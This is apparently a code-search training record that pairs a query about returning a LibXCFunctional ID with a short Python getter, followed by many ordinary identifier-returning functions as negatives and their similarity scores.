idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def fortran_function(self) -> str:\n if self.f_override is not None:\n return indent(\n self.f_override.replace('$CLASSNAME$', self.class_name).replace(\n \"$C_PREFIX$\", self.c_prefix).replace(\n \"$F_PREFIX$\", self.f_prefix),\n 4*' ')\n\n result = ''\n\n # declaration\n func_name = '{}_{}_{}'.format(\n self.f_prefix, self.class_name, self.name)\n in_parameters = self._f_in_parameters()\n return_type, out_parameters = self._f_out_parameters()\n if self.may_throw:\n out_parameters.append(('integer, optional', 'err_code'))\n out_parameters.append(('character(:), allocatable, optional',\n 'err_msg'))\n\n all_parameters = in_parameters + out_parameters\n arg_list = ', &\\n'.join([par_name for _, par_name in all_parameters])\n arg_ilist = indent(arg_list, 8*' ')\n if return_type != '':\n result += 'function {}( &\\n{})\\n'.format(func_name, arg_ilist)\n else:\n result += 'subroutine {}( &\\n{})\\n'.format(func_name, arg_ilist)\n\n # parameter declarations\n result += ' implicit none\\n'\n for par_type, par_name in in_parameters:\n result += ' {}, intent(in) :: {}\\n'.format(\n par_type, par_name)\n for par_type, par_name in out_parameters:\n result += ' {}, intent(out) :: {}\\n'.format(par_type, par_name)\n if return_type != '':\n result += ' {} :: {}\\n'.format(return_type, func_name)\n result += '\\n'\n\n # variable declarations\n c_return_type, fi_out_parameters = self._fi_out_parameters()\n if c_return_type:\n result += ' {} :: ret_val\\n'.format(c_return_type)\n for par_type, par_name in fi_out_parameters:\n result += ' {} :: 
{}\\n'.format(par_type, par_name)\n for par_type, par_name in self.ret_type.f_aux_variables():\n result += ' {} :: {}\\n'.format(par_type, par_name)\n if self.may_throw:\n result += ' integer (c_int) :: err_code_v\\n'\n result += ' type (c_ptr) :: err_msg_v\\n'\n result += ' integer (c_size_t) :: err_msg_len_v\\n'\n result += ' character (c_char), dimension(:), pointer :: err_msg_f\\n'\n result += ' character(:), allocatable :: err_msg_p\\n'\n result += ' integer (c_size_t) :: err_msg_i\\n'\n if c_return_type or fi_out_parameters or self.may_throw:\n result += '\\n'\n\n # convert input\n args = [param.f_chain_arg() for param in self.params]\n args += [par_name for _, par_name in fi_out_parameters]\n if self.may_throw:\n args += ['err_code_v', 'err_msg_v', 'err_msg_len_v']\n arg_str = ', &\\n'.join([8*' ' + arg for arg in args])\n\n # call C function\n fc_func_name = '{}_{}_{}_'.format(\n self.c_prefix, self.class_name, self.name)\n chain_call = self.fc_chain_call(\n ns_prefix=self.c_prefix, class_name=self.class_name,\n fc_func_name=fc_func_name, fc_args=arg_str)\n result_name = ''\n if return_type != '':\n result_name = func_name\n elif out_parameters:\n result_name = out_parameters[0][1]\n result += self.ret_type.f_call_c('ret_val', chain_call)\n\n # handle errors if necessary\n if self.may_throw:\n # Note: I tried to factor this out into a function, but Fortran\n # makes that near-impossible. Since we're generating anyway, it's\n # not really duplication, so leave it as is.\n result += indent(dedent(f\"\"\"\\\n if (err_code_v .ne. 0) then\n if (present(err_code)) then\n err_code = err_code_v\n if (present(err_msg)) then\n call c_f_pointer(err_msg_v, err_msg_f, (/err_msg_len_v/))\n allocate (character(err_msg_len_v) :: err_msg)\n do err_msg_i = 1, err_msg_len_v\n err_msg(err_msg_i:err_msg_i) = err_msg_f(err_msg_i)\n end do\n end if\n {dedent(\n self.ret_type.f_return_dummy_result(result_name))}\n return\n else\n call c_f_pointer(err_msg_v, err_msg_f, (/err_msg_len_v/))\n allocate (character(err_msg_len_v) :: err_msg_p)\n do err_msg_i = 1, err_msg_len_v\n err_msg_p(err_msg_i:err_msg_i) = err_msg_f(err_msg_i)\n end do\n print *, err_msg_p\n stop\n end if\n else\n if (present(err_code)) then\n err_code = 0\n end if\n end if\n\n \"\"\"), 4*' ')\n\n # convert and return result\n result += self.ret_type.f_return_result(result_name, 'ret_val')\n\n # end\n if return_type != '':\n result += 'end function {}\\n\\n'.format(func_name)\n else:\n result += 'end subroutine {}\\n\\n'.format(func_name)\n return indent(result, 4*' ')", "def get_function_raw_name_at(self, address):\n pass", "def __str__(self) -> str:\n return f'{self.name}.{self.arity}'", "def name(self) -> str:\n return self._formal_name", "def __str__(self):\n header = [\n ' ObjectiveFunction:']\n header += [('Function: {}').format(self.func.__name__)]\n header += [('Objective: {}').format(self.objective)]\n return ('\\n').join(header) + '\\n'", "def name(self):", "def name(self):", "def name(self):", "def name(self):", "def __str__(self):\n return f\"{self.name}\"", "def function_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"function_name\")", "def function(self) -> str:\n return pulumi.get(self, \"function\")", "def funcstring(funcname):\n s = str(funcname)[10:] #chop off '<function '\n spi = s.index(' ')\n return s[:spi]", "def describe(self):\n\n ret = []\n ret.append(\"Functional ID: %s\" % self._number)\n ret.append(\"Functional Name: %s\" % self._xc_func_name)\n ret.append(\"Attributes:\")\n ret.append(\" 
Name: %s\" % self._name)\n ret.append(\" Kind: %d\" % self._kind)\n ret.append(\" Family: %d\" % self._family)\n ret.append(\"Citations:\")\n for x in self._refs:\n ret.append(\" \" + x)\n\n return \"\\n\".join(ret)", "def hello(name):\n return f'Hello, {name}!'", "def __str__(self):\n return f'{self.name}' # TODO", "def __str__(self) -> str:\n return f'{self.name}'", "def __str__(self) -> str:\n return f'{self.name}'", "def __str__(self):\n return f\"{self.full_name} ({self.short_name})\"", "def __str__(self):\n return f\"{self.full_name} ({self.short_name})\"", "def funcname(func):\n try:\n return '%s()' % func.__name__\n except AttributeError:\n return repr(func)", "def function_name(parameters):", "def __str__(self):\n return f'{self.name}'", "def __str__(self):\n return f'{self.name}'", "def __str__(self):\r\n class_name = type(self).__name__\r\n return f'{class_name}({self.fname})'", "def _generate_function_specific_name(a, vertices):\n coeff_hash = hash(str(a))\n if coeff_hash < 0:\n # Cannot have minus sign in name\n coeff_hash *= -1\n vertices_hash = hash(str(vertices))\n if vertices_hash < 0:\n # Cannot have minus sign in name\n vertices_hash *= -1\n return str(coeff_hash) + \"_\" + str(vertices_hash)", "def __str__(self):\n return 'str-human.%s' % self.name", "def __str__(self):\n local_s = 'F30A: '\n local_s += '\\n'\n return local_s", "def function_name(cls):\n function_name = String(cls.__name__).snakecase().lower()\n return function_name", "def __str__(self):\n\n return \"name \\n\" + \" \" + str(self.name).center(9)", "def name(self):\n return f\"{self._name.replace('_', ' ')}\".title()", "def name(self):\n return 'data_extraction_for_' + '_'.join(self.names).lower()", "def get_name(self):", "def get_name(self):", "def name(self):\n return f\"{DEFAULT_NAME}_{BINARY_SENSOR}\"", "def display_name(self):", "def get_name():\n return \"SVMd+\"", "def printname(bruce):", "def full_name(self) -> str:\n\n if self.severity == 1:\n return self.name\n\n return f\"{self.name}[{self.severity}]\"", "def __str__(self):\n return f'<Name:{self.name}>'", "def __repr__(self):\n s = self.name\n if self.param != \"None\":\n s += ' with parameter '+self.param\n s += '; '+self.applyTo\n if self.applyTo != \"global\":\n s += ': '+self.conditions\n return s", "def __str__(self):\n s = ' KFData '\n s += 'vector: '+str(self.vec)+', \\t'\n s += 'matrix: '+str(self.cov)+', \\t'\n s += 'zrun: '+str(self.zrun)+',\\t'\n s += 'pars '+str(self.pars)\n return s", "def AttributeString(self) -> str:", "def AttributeString(self) -> str:", "def get_function_name(self):\n return self.__function", "def __str__(self):\n return f'<{self._name}>'", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(TransitionMatrix.key, self.nout, self.n_upd, self.mode)\n\n return strme", "def simple(self) -> str:\n str_ = self.method\n if self.basis is not None:\n str_ += f'/{self.basis}'\n return str_" ]
[ "0.70717007", "0.6821342", "0.67295676", "0.67295676", "0.6623396", "0.6613039", "0.66009283", "0.6593334", "0.65830815", "0.654439", "0.6526365", "0.6526365", "0.6526365", "0.6526365", "0.6526365", "0.6521252", "0.6521252", "0.6521252", "0.6521252", "0.65120167", "0.6506895", "0.64964104", "0.64947915", "0.64947915", "0.6492182", "0.6492182", "0.6480339", "0.64508814", "0.6409289", "0.6393725", "0.63732564", "0.6372583", "0.6352849", "0.6350365", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.6331348", "0.62898487", "0.62718433", "0.62333894", "0.6232135", "0.6231429", "0.6230003", "0.6227061", "0.6224759", "0.6194203", "0.61911815", "0.61911815", "0.6182352", "0.6173473", "0.6173082", "0.61640704", "0.6162362", "0.61497825", "0.61384183", "0.61384183", "0.61384183", "0.61384183", "0.6136714", "0.6133168", "0.61265206", "0.61245733", "0.6117015", "0.6116437", "0.61152893", "0.61075413", "0.61075413", "0.60718584", "0.60718584", "0.60705936", "0.60621476", "0.6061181", "0.6061181", "0.6056758", "0.6055933", "0.60527325", "0.6048542", "0.6025761", "0.6013507", "0.6012942", "0.60102165", "0.6005957", "0.6005957", "0.60012066", "0.6000711", "0.5993947", "0.598898", "0.59886223", "0.59606475", "0.59587747", "0.595738", "0.5956446", "0.5956446", "0.59536093", "0.5951155", "0.59449977", "0.5943859" ]
0.0
-1
Prints out a short description of the functional
def describe(self):
    ret = []
    ret.append("Functional ID: %s" % self._number)
    ret.append("Functional Name: %s" % self._xc_func_name)
    ret.append("Attributes:")
    ret.append(" Name: %s" % self._name)
    ret.append(" Kind: %d" % self._kind)
    ret.append(" Family: %d" % self._family)
    ret.append("Citations:")
    for x in self._refs:
        ret.append(" " + x)

    return "\n".join(ret)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __repr__(self):\n\t\treturn self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def description():", "def show_details(name, f, is_partial=False):\n print '%s:' % name\n print '\\tobject:', f\n if not is_partial:\n print '\\t__name__:', f.__name__\n print '\\t__doc__', repr(f.__doc__)\n if is_partial:\n print '\\tfunc:', f.func\n print '\\targs:', f.args\n print '\\tkeywords:', f.keywords\n return", "def describe(self) -> str:", "def describe():", "def display_message():\n\tprint(\"Learnt to write functions, which are named blocks of code that are designed to do one specific job.\")", "def explain(self):", "def usage() :\n\n print usage.__doc__", "def printhelp():", "def display_message():\n\tprint(\"In this chapter we will be learning how to write functions\")", "def description(self):", "def _summary(function):\n if not function.__doc__:\n return \"{}.\".format(function.__name__.capitalize())\n result = []\n for word in function.__doc__.split():\n result.append(word)\n if word.endswith(\".\"):\n break\n return \" \".join(result)", "def describe(self):\n print(self.description)", "def describe(self):\n print(self.description)", "def func_doc():", "def usage():", "def usage():", "def describe(self):\n return ''", "def usage():\n print(__doc__.strip())", "def summary_string(self) -> str:", "def print_actions_help():\n print(\\\n'''\\n\nTools for handling SELAFIN files and TELEMAC binary related in python\\n\nP ossible actions:\\n\n scan will print information about the SELAFIN, such as variables,\n their vales etc.\n spec will print information about a spectral file (also SELAFIN),\n such as frequencies, periodes, etc.\n chop will chop a SELAFIN given a new set of time range and step (but\n alter is better)\n alter will alter a SELAFIN file, choping or modifying time,\n converting its coordinates, extracting variables, etc.\n merge will merge two files together, whether they are continuous\n simulations (same variables) or putting variables together\n (same time definition)\n subdivide will subdivide a mesh by one iteration (splitting all triangles\n in four others)\n ''')", "def show_class_details(name, f):\n print '%s:' % name\n print '\\tobject:', f\n print '\\t__name__:', \n try:\n print f.__name__\n except AttributeError:\n print '(no __name__)'\n print '\\t__doc__', repr(f.__doc__)\n return", "def help_description():\n pass", "def help():", "def display_message():\n message = \"I am learning about functions, function calls, parameters and \"\n message+= \"arguments.\"\n print(message)", "def help():\n \n pass", "def summary(self):\n\n print(\"input label:\", self.__input_label)\n print(\"target label:\", self.__target_label)\n print(\"denoising label:\", 
self.denoising_label)\n print(\"contains a successful DE:\", self.is_successful())", "def get_description(self):\n text = \"is a student's t distribution; characterised by its degrees of freedom, which here is\"+str(self.dofs)+\".\"\n return text", "def usage():\n pass", "def __str__(self):\n header = [\n ' ObjectiveFunction:']\n header += [('Function: {}').format(self.func.__name__)]\n header += [('Objective: {}').format(self.objective)]\n return ('\\n').join(header) + '\\n'", "def display_short(self):\n print(f'{self.name.upper()} ({self.speciality.upper()})')", "def description() -> str:\n content = \"Demonstrates usage of blackbord remappings.\\n\"\n content += \"\\n\"\n content += \"Demonstration is via an exemplar behaviour making use of remappings..\\n\"\n\n if py_trees.console.has_colours:\n banner_line = console.green + \"*\" * 79 + \"\\n\" + console.reset\n s = banner_line\n s += console.bold_white + \"Blackboard\".center(79) + \"\\n\" + console.reset\n s += banner_line\n s += \"\\n\"\n s += content\n s += \"\\n\"\n s += banner_line\n else:\n s = content\n return s", "def get_description(self):\n print(\"This Iron door.\")", "def display_usage():\n print >> sys.stderr, __doc__", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def show_help():\n pass", "def describe(self):\r\n print( self.name + \" is here!\" )\r\n print( self.description )", "def display_message():\n\tmessage = \"I'm learning how to use function.\"\n\tprint(message)", "def print_help(self):\r\n\r\n print (\"\"\"Show data values for assignment.\r\n\r\nUsage:\r\n cat <request or table path>\r\n cat --id <assignment_id> #Where assignment_id provided by 'vers <table path>' command\r\n\r\nFormatting flags:\r\n\r\n -c or --comments - Show comments on/off\r\n -nc or --no-comments\r\n\r\n -ph or --horizontal - Print table horizontally\r\n -pa or --vertical - Print table vertically\r\n (If no '--horizontal' or '--vertical' flag is given, the layout of table is determined automatically:\r\n vertical layout if table has only 1 row and more than 3 columns, horizontal otherwise)\r\n\r\n -b or --borders - Switch show borders on of off\r\n -nb or --no-borders\r\n\r\n -h or --header - Show header on/off\r\n -nh or --no-header\r\n\r\n -t or --time - Show time\r\n -nt or --no-time\r\n\r\nExamples:\r\n > cat /test/test_vars/test_table #print latest data for test_table\r\n > cat /test/test_vars/test_table::subtest #print latest data in subtest variation\r\n > cat /test/test_vars/test_table:::2012-08 #print data latest for august 2012\r\n\r\nSee also 'dump' command which is 'cat' formatted to save data to files. 
'help dump'\r\n\r\n \"\"\")", "def print_help():\n print(bcolors.OKBLUE, \" \", \"=\"*80, bcolors.ENDC, sep=\"\")\n print(\"\"\" HELP\n \n No arg: Enter formula and get assembly printed on the screen\n 1 arg : Enter file and get file.asm (excluding the keyword \"help\")\n >2 arg: This screen shows up\n\"\"\")\n print(bcolors.OKBLUE, \" \", \"=\"*80, bcolors.ENDC, sep=\"\", end=\"\\n\\n\")", "def describe(f, verbose=False):\n return better_arg_spec(f, verbose)", "def Description(self) -> str:", "def Description(self) -> str:", "def print_help():\n print \"\\n# File Operations:\"\n print \" put [lpath] [spath] - upload file from lpath to spath\"\n print \" get [spath] [lpath] - download file at spath to lpath\"\n print \" mv [path1] [path2] - move stratus file from path1 to path2\"\n print \" link [path] - get web links to stratus file at given path\"\n print \" rm [path] - delete stratus file at given path\"", "def show(self,verbose=0):\n print 'inferenceArgs',self.ws.inferenceArgs\n print 'inferenceExpr',theano.pp(self.ws.inferenceExpr)\n if verbose>=1:\n print 'debugprint inferenceExpr:'\n theano.printing.debugprint(self.ws.inferenceExpr)\n if self.ws.dataLossExpr:\n print 'dataLossArgs',self.ws.dataLossArgs\n print 'dataLossExpr',theano.pp(self.ws.dataLossExpr)\n print 'debugprint dataLossExpr:'\n theano.printing.debugprint(self.ws.dataLossExpr)", "def showUsage():\n None", "def display_message():\n msg = \"I'm learning to store code in functions.\"\n print(msg)", "def help(self):\n res = \"\"", "def display_help(self):\n pass", "def description(self):\n pass", "def description(self):\n pass", "def __repr__(self) -> str:\n return f\"<Function[{self.name}](line:{self.line})>\"", "def fn(): # fn definition # help2\r\n print(my_text)", "def showInstructions():\n print(\"\"\"\n RPG Game\n ========\n Commands:\n go [direction]\n get [item]\n\n\t\"\"\")", "def printHelpFunc(self, func, leadingstrings=None):\n if leadingstrings is None:\n leadingstrings = ['- ', ' ']\n a, idx = 0, None\n for line in func.__doc__.split('\\n'):\n if len(line) == 0:\n continue\n if idx is None:\n idx = len(line) - len(line.lstrip(' '))\n if len(line) == idx:\n continue\n print(leadingstrings[a] + line[idx:])\n a = 1", "def info_on_utils_functions():\n\n table = PrettyTable([\"Utils functions\", \"Description\"])\n table.add_row(\n [\n \"clear_cache()\",\n (\n \"Clears the cache folder. 
\"\n \"Useful when updating `premise`\"\n \"or encountering issues with \"\n \"inventories.\"\n ),\n ]\n )\n table.add_row(\n [\n \"get_regions_definition(model)\",\n \"Retrieves the list of countries for each region of the model.\",\n ]\n )\n table.add_row(\n [\n \"ndb.NewDatabase(...)\\nndb.generate_scenario_report()\",\n \"Generates a summary of the most important scenarios' variables.\",\n ]\n )\n # align text to the left\n table.align = \"l\"\n table.hrules = ALL\n table._max_width = {\"Utils functions\": 50, \"Description\": 32}\n print(table)", "def getHelp(self,func = None):\n if func == None:\n print(self.__doc__)\n pass\n else:\n print(func.__doc__)\n pass", "def hook_description(self) -> str:", "def simple():", "def simple():", "def summary(self) -> str:\n pass", "def _show(self, indent = 0):\n print(\" \"*indent, \"Name:\", self.name)\n print(\" \"*indent, \"Description:\", self.description)", "def summary(self):\n return ''", "def summary_line_and_description():", "def help(self, *args):\n for _, v in self.useage.items():\n print v.__doc__", "def summarize(self):\n info(\"Running \" + self.title + \" generator\")", "def describe(self) -> Text:\n return self.__repr__()", "def summary(self):\n return \"{0:}: {1:} -> {2:}\".format(self.name, self.var, self.out)", "def help(self):", "def help(self):", "def summary(self):\n name = 'name : ' + self.get_name()\n description = 'description : ' + self.get_description()\n agility = 'agility : ' + str(self.get_agility())\n strength = 'strength : ' + str(self.get_strength())\n health_points = 'health_points : ' + str(self.get_health_points())\n summary = '\\n'.join([name, description, agility, strength, health_points])\n if self.take_weapon():\n summary += self.take_weapon().summary()\n return summary", "def print_hint(self):\n print(self.__doc__)", "def display(self):\n print(\"{}, {}\".format(self.label, self.params))", "def print_methods():\n print('''1. Sobol Variance Based:\n first and total order''')\n print('''2. Regional Sensitivity Analysis:\n also called Monte Carlo Filtering''')\n print('''3. Morris Screening Method:\n with pre-optimized defined trajects and group option''')\n print('''4. Sampled-OAT:\n Latin HYpercube or Sobol sampling with OAT sensitivity''')\n print('''5. Standardized Regression Coefficients:\n Latin HYpercube or Sobol sampling with linear regression''')\n print('''6. 
DYNamic Identifiability Analysis:\n Latin HYpercube or Sobol sampling with time-sliced based\n evaluation''')", "def introduction():\n \n print('WCA shifted Lennard-Jones potential')\n print('Diameter, sigma = 1')\n print('Well depth, epsilon = 1')\n print('Lees-Edwards boundaries')\n if fast:\n print('Fast NumPy force routine')\n else:\n print('Slow Python force routine')\n print('Uses neighbour lists')", "def logic_program_form(self):\r\n return '% -------------------------------------\\n' +\\\r\n '% Theory ' + self.name + '\\n' +\\\r\n '% -------------------------------------\\n\\n' +\\\r\n GENERAL_AXIOMS", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def function_label(function):\n args = getargspec(function.function)[0]\n args = ', '.join(args)\n output = function.output_labels\n output = ', '.join(output)\n label = \"Link from %s to %s\" % (args, output)\n return label", "def printSummary(self):\n pass", "def __str__(self) -> str:\n if self.decorator is None:\n decorator_str = \"\"\n elif self.decorator:\n decorator_str = \"+\"\n else:\n decorator_str = \"-\"\n return \" \".join([\"The nilpotent orbit corresponding\",\n f\"to partition {self.my_diagram}{decorator_str}\",\n f\"in type {self.my_type.letter()} {self.lie_rank}\"])", "def print_summary(self):\n #exec(\"print(storyline.{}_clause+', '+storyline.{}_clause.lower()+', '+storyline.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n #exec(\"print(self.{}_clause+', '+self.{}_clause.lower()+', '+self.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n lwr = \".lower()\"\n exec(\"print(\"+str(3*(\"self.{}_clause{}+',', \")).format(\"A\",\"\",\"B\",lwr,\"C\",lwr)+\"'\\b\\b')\")", "def printUsage():\n print 'Usage: wue2stein.py nodeFile edgeFile steinFile'", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(UmbrellaSampling.key, self.x0, self.kf, self.n_upd)\n\n return strme" ]
[ "0.7420096", "0.73075235", "0.73075235", "0.73075235", "0.73075235", "0.73075235", "0.72935873", "0.72935873", "0.72935873", "0.72896236", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7167525", "0.7109541", "0.69818276", "0.69633824", "0.6812129", "0.6797366", "0.67299414", "0.664648", "0.6646416", "0.66241515", "0.66191506", "0.6610698", "0.6610698", "0.66031444", "0.651108", "0.651108", "0.649883", "0.648516", "0.64775145", "0.6463342", "0.64565456", "0.6445121", "0.6442087", "0.6423719", "0.6414336", "0.64026254", "0.6402326", "0.6394812", "0.63816446", "0.6358813", "0.6340196", "0.63385123", "0.6335649", "0.6333734", "0.63248396", "0.6320015", "0.6310993", "0.6303345", "0.6300618", "0.6283043", "0.6274199", "0.6274199", "0.6266916", "0.62547517", "0.62464833", "0.6211855", "0.62082124", "0.62039626", "0.6194705", "0.6194705", "0.61759686", "0.61708796", "0.61647606", "0.6163661", "0.615775", "0.6152382", "0.61436945", "0.61433387", "0.61433387", "0.6141855", "0.61406463", "0.61401063", "0.6139494", "0.61390924", "0.6137989", "0.61357415", "0.6130724", "0.61286443", "0.61286443", "0.6128248", "0.612775", "0.6123972", "0.61218107", "0.61210835", "0.6115514", "0.6112705", "0.61104864", "0.61031795", "0.6102682", "0.60957444", "0.60834944", "0.60771513" ]
document_score: 0.6748803
document_rank: 24
query: Returns the LibXCFunctional ID.
document: def get_number(self): return self._number
metadata: { "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getId(self):\n return _libsbml.FunctionDefinition_getId(self)", "def get_func_id_from_tsuid(self, tsuid):\n check_type(value=tsuid, allowed_types=str, var_name=\"tsuid\", raise_exception=True)\n\n response = self.send(root_url=self.session.dm_url + self.root_url,\n verb=GenericClient.VERB.GET,\n template=TEMPLATES['get_one_functional_identifier'],\n uri_params={'tsuid': tsuid},\n data=None,\n files=None)\n\n check_http_code(response)\n\n return response.json['funcId']", "def unique_id(self):\n return f\"{self._device.uuid}-FAN\"", "def data_factory_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"data_factory_id\")", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_status\", \"frigate\"\n )", "def _get_device_id(api: Mobileclient) -> str:\n\n try:\n _get_device_id_from_environment()\n except KeyError:\n pass\n\n return _get_device_id_from_registered(api)", "def uuid(self):\n if openmediavault.string.is_fs_uuid(self._id):\n return self._id\n return self.get_udev_property('ID_FS_UUID')", "def data_factory_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"data_factory_id\")", "def get_device_id(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def getId(self):\n return _libsbml.SpeciesFeature_getId(self)", "def dev_id(self):\n return self.setup.dev_id", "def identifier(self):\n return str(self._nfcid)", "def device_id(self):\n return self.unique_id", "def get_id(self):\n try:\n return self.inst.query('*IDN?')[:36]\n except errors.VisaIOError as e:\n logger.warning(e)\n return 'Device not connected.'", "def get_firmware_id(self):\n build_id_addr = self._get_slt_entry(1)\n build_id_int = self.get_data(build_id_addr)\n if build_id_addr % Arch.addr_per_word != 0:\n # in a 32 bit word, the 16 bit build ID int can be in either the 2\n # MS bytes or 2 LS bytes\n build_id_int >>= 16\n return build_id_int & 0xFFFF", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"gpu_load\", self._gpu_name\n )", "def data_factory_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"data_factory_id\")", "def get_id(self): # real signature unknown; restored from __doc__\n return \"\"", "def getId(self):\n return _libsbml.SpeciesFeatureType_getId(self)", "def generate_id():\n\treturn \"%s-%s\" % (str(uuid.uuid4())[:4],random.choice(funnames).lower())", "def unique_id(self) -> str | None:\n return f\"{self._station_id}_{self._fuel_type}\"", "def build_id():\n return \"test123\"", "def get_id(self):\n\t\treturn call_sdk_function('PrlSrvCfgDev_GetId', self.handle)", "def device_id(self):\n data = fcntl.ioctl(self._fd, _EVIOCGID, '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00')\n idbus, idvendor, idproduct, idversion = struct.unpack(\"hhhh\", data)\n return idbus, idvendor, idproduct, idversion", "def get_file_id(self, lfn):\n\n raise NotImplementedError('get_file_id')", "def facility_id(self):\n return self.facility_names.get(\n self.facility, self.facility_names['user'])", "def id(self):\n # Might also be a first 12-characters shortcut.\n return self._id", "def retrieve_device_id(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_temp\", self._name\n )", "def get_debug_firmware_id(self):\n # Read the address via get_var_strict; this will fetch the value\n # from chipdata as well, but we can ignore it.\n int_addr = 
self.debuginfo.get_var_strict(\n '$_build_identifier_integer'\n ).address\n build_id_int = self.debuginfo.get_dm_const(int_addr, 0)\n if Arch.addr_per_word == 4:\n # in a 32 bit word, the 16 bit build ID int can be in either the 2\n # MS bytes or 2 LS bytes\n if int_addr % Arch.addr_per_word != 0:\n build_id_int >>= 16\n build_id_int &= 0xFFFF\n return build_id_int", "def generate_id():\n return \"%s-%s\" % (str(uuid.uuid4())[:4],random.choice(funnames).lower())", "def unique_id(self) -> str:\n return f\"{self._mac}_tracker\"", "def device_id(self):\n return self._id[0]", "def unique_id(self):\n return self.device_id", "def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)", "def device_id(self) -> str:\n return self._device_info[\"ID\"]", "def getID():", "def idfname(self):\n if self._idfname is None:\n idfname = StringIO(f\"VERSION, {self.as_version};\")\n idfname.seek(0)\n self._idfname = idfname\n else:\n if isinstance(self._idfname, StringIO):\n self._idfname.seek(0)\n else:\n self._idfname = Path(self._idfname).expand()\n return self._idfname", "def id(self) -> str:\n return self.properties[DBUS_ATTR_ID]", "def unique_id(self):\n return self._device_id", "def id(self) -> str:\n\n return self._inst.query('*IDN?')", "def unique_id() -> str:", "def uuid():\n from dallinger.experiment import Experiment\n\n click.echo(Experiment.make_uuid())", "def generate_id(cls):\n cls._index += 1\n return 'fp_%s' % cls._index", "def unique_id(self) -> str:\n return f\"{self._device.unique_id}_battery\"", "def unique_id(self) -> str:\n return '{0}_{1}'.format(self._mac.replace(':', ''), self.entity_id)", "def id(self) -> str:\n pass", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_fps\", \"detection\"\n )", "def get_fsid(cluster):\n fsid = get_conf_with_default(cluster=cluster, variable='fsid')\n if fsid is None:\n raise Error('getting cluster uuid from configuration failed')\n return fsid.lower()", "def get_identifier(self):", "def get_tsuid_from_fid(self, fid):\n check_is_fid_valid(fid=fid, raise_exception=True)\n\n # empty result => throws IkatsNotFoundError\n res = self.search_functional_identifiers(criterion_type='funcIds', criteria_list=[fid])\n\n assert (isinstance(res, list)), \"get_tsuid_from_func_id: failed to retrieve json result as list\"\n assert (isinstance(res[0], dict)), \"get_tsuid_from_func_id: failed to retrieve first item from result list\"\n return res[0]['tsuid']", "def unique_id(self):\n return self._device.serial", "def unique_id(self) -> Optional[str]:\n return self._device.device_id", "def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")", "def get_ticket_id():\n return str(time.time()) + str(uuid.uuid4())", "def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_id(self) -> str:\n return self._register_id", "def get_family_id(self):\n return self._family_id", "def getId(self):\n return _libsbml.SBase_getId(self)", "def 
